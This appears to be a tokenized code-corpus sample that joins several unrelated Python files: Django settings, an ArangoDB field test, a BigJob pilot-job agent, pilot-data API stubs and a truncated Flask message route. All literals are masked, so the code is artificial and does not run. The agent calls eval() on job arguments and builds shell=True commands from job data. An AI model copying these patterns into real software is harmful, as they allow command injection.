<s> DEBUG = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> ALLOWED_HOSTS = [ ] <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SITE_ID = <NUM_LIT:1> <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) </s>
<s> import unittest <EOL> from arangodb . orm . fields import BooleanField <EOL> class BooleanFieldTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_basic_creation_with_default ( self ) : <EOL> boolean = False <EOL> field = BooleanField ( default = boolean ) <EOL> self . assertEqual ( boolean , field . boolean ) <EOL> def test_equals ( self ) : <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( True ) <EOL> boolean2 = BooleanField ( ) <EOL> boolean2 . set ( True ) <EOL> self . assertEqual ( boolean1 , boolean2 ) <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( False ) <EOL> boolean2 = BooleanField ( ) <EOL> boolean2 . set ( False ) <EOL> self . assertEqual ( boolean1 , boolean2 ) <EOL> def test_equal_with_wrong_class ( self ) : <EOL> boolean1 = BooleanField ( ) <EOL> boolean1 . set ( False ) <EOL> self . assertTrue ( not ( boolean1 == False ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import bigjob . state <EOL> import socket <EOL> import threading <EOL> import time <EOL> import pdb <EOL> import traceback <EOL> import ConfigParser <EOL> import types <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> try : <EOL> import saga <EOL> except : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> sys . path . append ( os . path . dirname ( os . path . abspath ( __file__ ) ) + "<STR_LIT>" ) <EOL> logging . debug ( str ( sys . path ) ) <EOL> from threadpool import * <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:4> ) : <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> import subprocess <EOL> """<STR_LIT>""" <EOL> CONFIG_FILE = "<STR_LIT>" <EOL> THREAD_POOL_SIZE = <NUM_LIT:4> <EOL> APPLICATION_NAME = "<STR_LIT>" <EOL> class bigjob_agent : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , args ) : <EOL> self . coordination_url = args [ <NUM_LIT:1> ] <EOL> self . jobs = [ ] <EOL> self . processes = { } <EOL> self . freenodes = [ ] <EOL> self . busynodes = [ ] <EOL> self . restarted = { } <EOL> conf_file = os . path . dirname ( os . path . abspath ( __file__ ) ) + "<STR_LIT>" + CONFIG_FILE <EOL> config = ConfigParser . ConfigParser ( ) <EOL> logging . debug ( "<STR_LIT>" + conf_file ) <EOL> config . read ( conf_file ) <EOL> default_dict = config . defaults ( ) <EOL> self . CPR = default_dict [ "<STR_LIT>" ] <EOL> self . SHELL = default_dict [ "<STR_LIT>" ] <EOL> self . MPIRUN = default_dict [ "<STR_LIT>" ] <EOL> logging . debug ( "<STR_LIT>" + self . 
CPR + "<STR_LIT>" + self . MPIRUN + "<STR_LIT>" + self . SHELL ) <EOL> self . init_rms ( ) <EOL> self . failed_polls = <NUM_LIT:0> <EOL> self . base_url = args [ <NUM_LIT:2> ] <EOL> logging . debug ( "<STR_LIT>" + str ( args ) ) <EOL> logging . debug ( "<STR_LIT>" + self . base_url ) <EOL> if ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_advert import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" + self . coordination_url ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> elif ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_redis import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" + self . coordination_url + "<STR_LIT:.>" ) <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> elif ( self . coordination_url . startswith ( "<STR_LIT>" ) ) : <EOL> try : <EOL> from coordination . bigjob_coordination_zmq import bigjob_coordination <EOL> logging . debug ( "<STR_LIT>" ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> self . coordination = bigjob_coordination ( server_connect_url = self . coordination_url ) <EOL> self . coordination . set_pilot_state ( self . base_url , str ( bigjob . state . Running ) , False ) <EOL> self . resource_lock = threading . RLock ( ) <EOL> self . threadpool = ThreadPool ( THREAD_POOL_SIZE ) <EOL> self . launcher_thread = threading . Thread ( target = self . dequeue_new_jobs ) <EOL> self . launcher_thread . start ( ) <EOL> self . monitoring_thread = threading . Thread ( target = self . start_background_thread ) <EOL> self . monitoring_thread . start ( ) <EOL> def init_rms ( self ) : <EOL> if ( os . environ . get ( "<STR_LIT>" ) != None ) : <EOL> return self . init_pbs ( ) <EOL> elif ( os . environ . get ( "<STR_LIT>" ) != None ) : <EOL> return self . init_sge ( ) <EOL> else : <EOL> return self . 
init_local ( ) <EOL> return None <EOL> def init_local ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> num_cpus = self . get_num_cpus ( ) <EOL> for i in range ( <NUM_LIT:0> , num_cpus ) : <EOL> self . freenodes . append ( "<STR_LIT>" ) <EOL> except IOError : <EOL> self . freenodes = [ "<STR_LIT>" ] <EOL> def init_sge ( self ) : <EOL> """<STR_LIT>""" <EOL> sge_node_file = os . environ . get ( "<STR_LIT>" ) <EOL> if sge_node_file == None : <EOL> return <EOL> f = open ( sge_node_file ) <EOL> sgenodes = f . readlines ( ) <EOL> f . close ( ) <EOL> for i in sgenodes : <EOL> columns = i . split ( ) <EOL> try : <EOL> for j in range ( <NUM_LIT:0> , int ( columns [ <NUM_LIT:1> ] ) ) : <EOL> logging . debug ( "<STR_LIT>" + columns [ <NUM_LIT:0> ] . strip ( ) ) <EOL> self . freenodes . append ( columns [ <NUM_LIT:0> ] + "<STR_LIT:\n>" ) <EOL> except : <EOL> pass <EOL> return self . freenodes <EOL> def init_pbs ( self ) : <EOL> """<STR_LIT>""" <EOL> pbs_node_file = os . environ . get ( "<STR_LIT>" ) <EOL> if pbs_node_file == None : <EOL> return <EOL> f = open ( pbs_node_file ) <EOL> self . freenodes = f . readlines ( ) <EOL> f . close ( ) <EOL> num_cpus = self . get_num_cpus ( ) <EOL> node_dict = { } <EOL> for i in set ( self . freenodes ) : <EOL> node_dict [ i ] = self . freenodes . count ( i ) <EOL> if node_dict [ i ] < num_cpus : <EOL> node_dict [ i ] = num_cpus <EOL> self . freenodes = [ ] <EOL> for i in node_dict . keys ( ) : <EOL> logging . debug ( "<STR_LIT>" + i + "<STR_LIT>" + str ( node_dict [ i ] ) ) <EOL> for j in range ( <NUM_LIT:0> , node_dict [ i ] ) : <EOL> logging . debug ( "<STR_LIT>" + i . strip ( ) ) <EOL> self . freenodes . append ( i ) <EOL> def get_num_cpus ( self ) : <EOL> cpuinfo = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> cpus = cpuinfo . readlines ( ) <EOL> cpuinfo . close ( ) <EOL> num = <NUM_LIT:0> <EOL> for i in cpus : <EOL> if i . 
startswith ( "<STR_LIT>" ) : <EOL> num = num + <NUM_LIT:1> <EOL> return num <EOL> def execute_job ( self , job_url , job_dict ) : <EOL> """<STR_LIT>""" <EOL> state = str ( job_dict [ "<STR_LIT:state>" ] ) <EOL> if ( state == str ( bigjob . state . Unknown ) or <EOL> state == str ( bigjob . state . New ) ) : <EOL> try : <EOL> logging . debug ( "<STR_LIT>" + str ( job_dict ) ) <EOL> numberofprocesses = "<STR_LIT:1>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> numberofprocesses = job_dict [ "<STR_LIT>" ] <EOL> spmdvariation = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> spmdvariation = job_dict [ "<STR_LIT>" ] <EOL> arguments = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> arguments_raw = job_dict [ '<STR_LIT>' ] ; <EOL> if type ( arguments_raw ) == types . ListType : <EOL> arguments_list = arguments_raw <EOL> else : <EOL> arguments_list = eval ( job_dict [ "<STR_LIT>" ] ) <EOL> for i in arguments_list : <EOL> arguments = arguments + "<STR_LIT:U+0020>" + i <EOL> workingdirectory = os . getcwd ( ) <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> workingdirectory = job_dict [ "<STR_LIT>" ] <EOL> environment = os . environ <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> for i in job_dict [ "<STR_LIT>" ] : <EOL> env = i . split ( "<STR_LIT:=>" ) <EOL> environment [ env [ <NUM_LIT:0> ] ] = env [ <NUM_LIT:1> ] + "<STR_LIT::>" + environment [ env [ <NUM_LIT:0> ] ] <EOL> environment [ "<STR_LIT>" ] = workingdirectory + "<STR_LIT::>" + environment [ "<STR_LIT>" ] <EOL> print "<STR_LIT>" , environment [ "<STR_LIT>" ] <EOL> executable = job_dict [ "<STR_LIT>" ] <EOL> output = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> output = job_dict [ "<STR_LIT>" ] <EOL> error = "<STR_LIT>" <EOL> if ( job_dict . has_key ( "<STR_LIT>" ) == True ) : <EOL> error = job_dict [ "<STR_LIT>" ] <EOL> self . jobs . append ( job_url ) <EOL> output_file = os . 
path . join ( workingdirectory , output ) <EOL> error_file = os . path . join ( workingdirectory , error ) <EOL> logging . debug ( "<STR_LIT>" + output_file + "<STR_LIT>" + error_file + "<STR_LIT>" + str ( environment ) ) <EOL> stdout = open ( output_file , "<STR_LIT:w>" ) <EOL> stderr = open ( error_file , "<STR_LIT:w>" ) <EOL> command = executable + "<STR_LIT:U+0020>" + arguments <EOL> machinefile = self . allocate_nodes ( job_dict ) <EOL> host = "<STR_LIT:localhost>" <EOL> try : <EOL> machine_file_handler = open ( machinefile , "<STR_LIT:r>" ) <EOL> node = machine_file_handler . readlines ( ) <EOL> machine_file_handler . close ( ) <EOL> host = node [ <NUM_LIT:0> ] . strip ( ) <EOL> except : <EOL> pass <EOL> if ( machinefile == None ) : <EOL> logging . debug ( "<STR_LIT>" + job_url ) <EOL> self . coordination . queue_job ( self . base_url , job_url ) <EOL> return <EOL> if ( spmdvariation . lower ( ) == "<STR_LIT>" ) : <EOL> command = "<STR_LIT>" + workingdirectory + "<STR_LIT>" + self . MPIRUN + "<STR_LIT>" + numberofprocesses + "<STR_LIT>" + machinefile + "<STR_LIT:U+0020>" + command <EOL> else : <EOL> command = "<STR_LIT>" + executable + "<STR_LIT>" + workingdirectory + "<STR_LIT:;>" + command <EOL> shell = self . SHELL <EOL> logging . debug ( "<STR_LIT>" + command + "<STR_LIT>" + workingdirectory + "<STR_LIT>" + str ( socket . gethostname ( ) ) + "<STR_LIT>" + shell + "<STR_LIT:)>" ) <EOL> p = subprocess . Popen ( args = command , executable = shell , stderr = stderr , <EOL> stdout = stdout , cwd = workingdirectory , <EOL> env = environment , shell = True ) <EOL> logging . debug ( "<STR_LIT>" + command ) <EOL> dirlist = os . listdir ( workingdirectory ) <EOL> print dirlist <EOL> os . system ( "<STR_LIT>" ) <EOL> self . processes [ job_url ] = p <EOL> self . coordination . set_job_state ( job_url , str ( bigjob . state . Running ) ) <EOL> except : <EOL> traceback . print_exc ( file = sys . 
stderr ) <EOL> def allocate_nodes ( self , job_dict ) : <EOL> """<STR_LIT>""" <EOL> self . resource_lock . acquire ( ) <EOL> number_nodes = int ( job_dict [ "<STR_LIT>" ] ) <EOL> nodes = [ ] <EOL> machine_file_name = None <EOL> if ( len ( self . freenodes ) >= number_nodes ) : <EOL> unique_nodes = set ( self . freenodes ) <EOL> for i in unique_nodes : <EOL> number = self . freenodes . count ( i ) <EOL> logging . debug ( "<STR_LIT>" + i + "<STR_LIT>" + str ( number ) <EOL> + "<STR_LIT>" + str ( self . busynodes ) <EOL> + "<STR_LIT>" + str ( self . freenodes ) ) <EOL> for j in range ( <NUM_LIT:0> , number ) : <EOL> if ( number_nodes > <NUM_LIT:0> ) : <EOL> nodes . append ( i ) <EOL> self . freenodes . remove ( i ) <EOL> self . busynodes . append ( i ) <EOL> number_nodes = number_nodes - <NUM_LIT:1> <EOL> else : <EOL> break <EOL> machine_file_name = self . get_machine_file_name ( job_dict ) <EOL> machine_file = open ( machine_file_name , "<STR_LIT:w>" ) <EOL> machine_file . writelines ( nodes ) <EOL> machine_file . close ( ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name + "<STR_LIT>" + str ( nodes ) ) <EOL> self . resource_lock . release ( ) <EOL> return machine_file_name <EOL> def setup_charmpp_nodefile ( self , allocated_nodes ) : <EOL> """<STR_LIT>""" <EOL> nodefile_string = "<STR_LIT>" <EOL> for i in allocated_nodes : <EOL> if i . has_key ( "<STR_LIT>" ) : <EOL> nodefile_string = nodefile_string + "<STR_LIT>" + i [ "<STR_LIT>" ] + "<STR_LIT>" + str ( i [ "<STR_LIT>" ] ) + "<STR_LIT>" <EOL> else : <EOL> nodefile_string = nodefile_string + "<STR_LIT>" + i [ "<STR_LIT>" ] + "<STR_LIT>" + str ( i [ "<STR_LIT>" ] ) + "<STR_LIT>" <EOL> jd = saga . job . description ( ) <EOL> jd . executable = "<STR_LIT>" <EOL> jd . number_of_processes = "<STR_LIT:1>" <EOL> jd . spmd_variation = "<STR_LIT>" <EOL> jd . arguments = [ "<STR_LIT>" + nodefile_string + "<STR_LIT>" , "<STR_LIT:>>" , "<STR_LIT>" ] <EOL> jd . output = "<STR_LIT>" <EOL> jd . 
error = "<STR_LIT>" <EOL> job_service_url = saga . url ( "<STR_LIT>" + allocated_nodes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> job_service = saga . job . service ( self . session , job_service_url ) <EOL> job = job_service . create_job ( jd ) <EOL> job . run ( ) <EOL> job . wait ( ) <EOL> def print_machine_file ( self , filename ) : <EOL> fh = open ( filename , "<STR_LIT:r>" ) <EOL> lines = fh . readlines ( ) <EOL> fh . close <EOL> logging . debug ( "<STR_LIT>" + filename + "<STR_LIT>" + str ( lines ) ) <EOL> def free_nodes ( self , job_url ) : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> self . resource_lock . acquire ( ) <EOL> number_nodes = int ( job_dict [ "<STR_LIT>" ] ) <EOL> machine_file_name = self . get_machine_file_name ( job_dict ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name ) <EOL> allocated_nodes = [ "<STR_LIT>" ] <EOL> try : <EOL> machine_file = open ( machine_file_name , "<STR_LIT:r>" ) <EOL> allocated_nodes = machine_file . readlines ( ) <EOL> machine_file . close ( ) <EOL> except : <EOL> traceback . print_exc ( file = sys . stderr ) <EOL> logging . debug ( "<STR_LIT>" + str ( allocated_nodes ) ) <EOL> for i in allocated_nodes : <EOL> logging . debug ( "<STR_LIT>" + str ( i ) + "<STR_LIT>" + str ( self . busynodes ) <EOL> + "<STR_LIT>" + str ( self . freenodes ) ) <EOL> self . busynodes . remove ( i ) <EOL> self . freenodes . append ( i ) <EOL> logging . debug ( "<STR_LIT>" + machine_file_name ) <EOL> if os . path . exists ( machine_file_name ) : <EOL> os . remove ( machine_file_name ) <EOL> self . resource_lock . release ( ) <EOL> def get_machine_file_name ( self , job_dict ) : <EOL> """<STR_LIT>""" <EOL> job_id = job_dict [ "<STR_LIT>" ] <EOL> homedir = os . path . expanduser ( '<STR_LIT>' ) <EOL> return homedir + "<STR_LIT>" + job_id <EOL> def dequeue_new_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> job_counter = <NUM_LIT:0> <EOL> while self . is_stopped ( self . base_url ) == False : <EOL> if len ( self . 
freenodes ) == <NUM_LIT:0> : <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> continue <EOL> logging . debug ( "<STR_LIT>" + self . base_url ) <EOL> job_url = self . coordination . dequeue_job ( self . base_url ) <EOL> if job_url == None : <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> continue <EOL> if job_url == "<STR_LIT>" : <EOL> break <EOL> job_counter = job_counter + <NUM_LIT:1> <EOL> if ( job_counter % ( THREAD_POOL_SIZE ) ) == <NUM_LIT:0> : <EOL> self . threadpool . wait ( ) <EOL> request = WorkRequest ( self . start_new_job_in_thread , [ job_url ] ) <EOL> self . threadpool . putRequest ( request ) <EOL> self . threadpool . wait ( ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def start_new_job_in_thread ( self , job_url ) : <EOL> """<STR_LIT>""" <EOL> if job_url != None : <EOL> failed = False ; <EOL> try : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> except : <EOL> failed = True <EOL> if job_dict == None or failed == True : <EOL> self . coordination . queue_job ( self . pilot_url , job_url ) <EOL> logging . debug ( "<STR_LIT>" + job_url + "<STR_LIT>" + str ( job_dict ) ) <EOL> if ( job_dict [ "<STR_LIT:state>" ] == str ( bigjob . state . Unknown ) ) : <EOL> job_dict [ "<STR_LIT:state>" ] = str ( bigjob . state . New ) <EOL> self . coordination . set_job_state ( job_url , str ( bigjob . state . New ) ) <EOL> self . execute_job ( job_url , job_dict ) <EOL> def monitor_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( "<STR_LIT>" % len ( self . jobs ) ) <EOL> for i in self . jobs : <EOL> if self . processes . has_key ( i ) : <EOL> p = self . processes [ i ] <EOL> p_state = p . poll ( ) <EOL> logging . debug ( self . print_job ( i ) + "<STR_LIT>" + str ( p_state ) + "<STR_LIT>" + str ( p . returncode ) ) <EOL> if ( p_state != None and ( p_state == <NUM_LIT:0> or p_state == <NUM_LIT:255> ) ) : <EOL> logging . debug ( "<STR_LIT>" + self . print_job ( i ) ) <EOL> self . coordination . set_job_state ( i , str ( bigjob . state . 
Done ) ) <EOL> self . free_nodes ( i ) <EOL> del self . processes [ i ] <EOL> elif p_state != <NUM_LIT:0> and p_state != <NUM_LIT:255> and p_state != None : <EOL> logging . debug ( self . print_job ( i ) + "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" + self . print_job ( i ) ) <EOL> self . coordination . set_job_state ( i , str ( bigjob . state . Failed ) ) <EOL> self . free_nodes ( i ) <EOL> del self . processes [ i ] <EOL> def print_job ( self , job_url ) : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> return ( "<STR_LIT>" + job_url <EOL> + "<STR_LIT>" + job_dict [ "<STR_LIT>" ] ) <EOL> def start_background_thread ( self ) : <EOL> self . stop = False <EOL> logging . debug ( "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" + str ( len ( self . freenodes ) ) + "<STR_LIT>" + str ( len ( self . busynodes ) ) ) <EOL> while True and self . stop == False : <EOL> if self . is_stopped ( self . base_url ) == True : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> logging . debug ( "<STR_LIT>" + str ( self . base_url ) + "<STR_LIT>" ) <EOL> try : <EOL> self . monitor_jobs ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> self . failed_polls = <NUM_LIT:0> <EOL> except : <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> self . failed_polls = self . failed_polls + <NUM_LIT:1> <EOL> if self . failed_polls > <NUM_LIT:3> : <EOL> break <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def is_stopped ( self , base_url ) : <EOL> state = None <EOL> try : <EOL> state = self . coordination . get_pilot_state ( base_url ) <EOL> except : <EOL> pass <EOL> logging . debug ( "<STR_LIT>" + str ( state ) ) <EOL> if state == None or state . has_key ( "<STR_LIT>" ) == False or state [ "<STR_LIT>" ] == True : <EOL> return True <EOL> else : <EOL> return False <EOL> def stop_background_thread ( self ) : <EOL> self . stop = True <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> args = sys . 
argv <EOL> num_args = len ( args ) <EOL> if ( num_args != <NUM_LIT:3> ) : <EOL> print "<STR_LIT>" + args [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> bigjob_agent = bigjob_agent ( args ) </s>
<s> import sys <EOL> import os <EOL> import time <EOL> import logging <EOL> import json <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> from pilot import PilotDataService , ComputeDataService , DataUnit , State <EOL> COORDINATION_URL = "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) == <NUM_LIT:2> : <EOL> reconnect_url = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> print "<STR_LIT>" + sys . executable + "<STR_LIT:U+0020>" + __file__ + "<STR_LIT>" <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> pilot_data_service = PilotDataService ( coordination_url = COORDINATION_URL ) <EOL> pd_new = pilot_data_service . create_pilot ( { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:size>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ) <EOL> logging . debug ( "<STR_LIT>" % pilot_data_service . url ) <EOL> logging . debug ( "<STR_LIT>" % reconnect_url ) <EOL> pd = DataUnit ( du_url = reconnect_url ) <EOL> pd . add_pilot_data ( pd_new ) </s>
<s> """<STR_LIT>""" <EOL> class PilotDataDescription ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ attr ] = value <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> class PilotData ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def __init__ ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_state ( self ) : <EOL> pass <EOL> class PilotDataService ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def __init__ ( self , pss_id = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def create_pilot ( self , pilot_data_description ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def list_pilots ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DataUnitService ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pds_id = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def add_pilot_data_service ( self , pss ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def remove_pilot_data_service ( self , pss ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def list_pilot_data ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def submit_pilot_data_set ( self , data_unit_description ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_state ( self ) : <EOL> pass <EOL> def get_id ( self ) : <EOL> pass <EOL> class DataUnitDescription ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ 
attr ] = value <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> class DataUnit ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def get_state ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def export ( self , target_directory ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import pdb <EOL> import sys <EOL> """<STR_LIT>""" <EOL> COORDINATION_URL = "<STR_LIT>" <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) + "<STR_LIT>" ) <EOL> from bigjob import bigjob , subjob , description <EOL> def main ( ) : <EOL> queue = None <EOL> project = None <EOL> walltime = <NUM_LIT:10> <EOL> processes_per_node = <NUM_LIT:12> <EOL> number_of_processes = <NUM_LIT:12> <EOL> workingdirectory = os . path . join ( os . getcwd ( ) , "<STR_LIT>" ) <EOL> userproxy = None <EOL> """<STR_LIT>""" <EOL> lrms_url = "<STR_LIT>" <EOL> print "<STR_LIT>" + lrms_url <EOL> bj = bigjob ( COORDINATION_URL ) <EOL> bj . start_pilot_job ( lrms_url , <EOL> number_of_processes , <EOL> queue , <EOL> project , <EOL> workingdirectory , <EOL> userproxy , <EOL> walltime , <EOL> processes_per_node ) <EOL> print "<STR_LIT>" + bj . pilot_url + "<STR_LIT>" + str ( bj . get_state ( ) ) <EOL> jd = description ( ) <EOL> jd . executable = "<STR_LIT>" <EOL> jd . number_of_processes = "<STR_LIT:1>" <EOL> jd . spmd_variation = "<STR_LIT>" <EOL> jd . arguments = [ "<STR_LIT>" ] <EOL> jd . output = "<STR_LIT>" <EOL> jd . error = "<STR_LIT>" <EOL> sj = subjob ( ) <EOL> sj . submit_job ( bj . pilot_url , jd ) <EOL> while <NUM_LIT:1> : <EOL> state = str ( sj . get_state ( ) ) <EOL> print "<STR_LIT>" + state <EOL> if ( state == "<STR_LIT>" or state == "<STR_LIT>" ) : <EOL> break <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> bj . cancel ( ) <EOL> """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import copy <EOL> __author__ = '<STR_LIT>' <EOL> from flask import Blueprint <EOL> import json <EOL> from GithubAPI . GithubAPI import GitHubAPI_Keys <EOL> from google . appengine . ext import db <EOL> import requests <EOL> import datetime <EOL> from operator import itemgetter <EOL> from flask import Flask , request , render_template , redirect , abort , Response <EOL> from flask . ext . github import GitHub <EOL> from flask . ext . cors import CORS , cross_origin <EOL> from flask . ext . autodoc import Autodoc <EOL> from models . Course import Course <EOL> from models . Project import Project <EOL> from models . Message import Message <EOL> from SE_API . Validation_Utils import * <EOL> from SE_API . Respones_Utils import * <EOL> message_routes = Blueprint ( "<STR_LIT>" , __name__ ) <EOL> auto = Autodoc ( ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ auto . doc ( ) <EOL> def createMessage ( token ) : <EOL> """<STR_LIT>""" <EOL> if not request . data : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> user = get_user_by_token ( token ) <EOL> try : <EOL> payload = json . loads ( request . data ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg = Message ( groupId = payload [ '<STR_LIT>' ] , message = payload [ '<STR_LIT:message>' ] , msgDate = datetime . datetime . now ( ) , master_id = user . key ( ) . id ( ) ) <EOL> except Exception as e : <EOL> print e <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg . isProject = payload [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> pass <EOL> db . put ( msg ) <EOL> db . save <EOL> return Response ( response = msg . to_JSON ( ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT:GET>" ] ) <EOL> @ auto . 
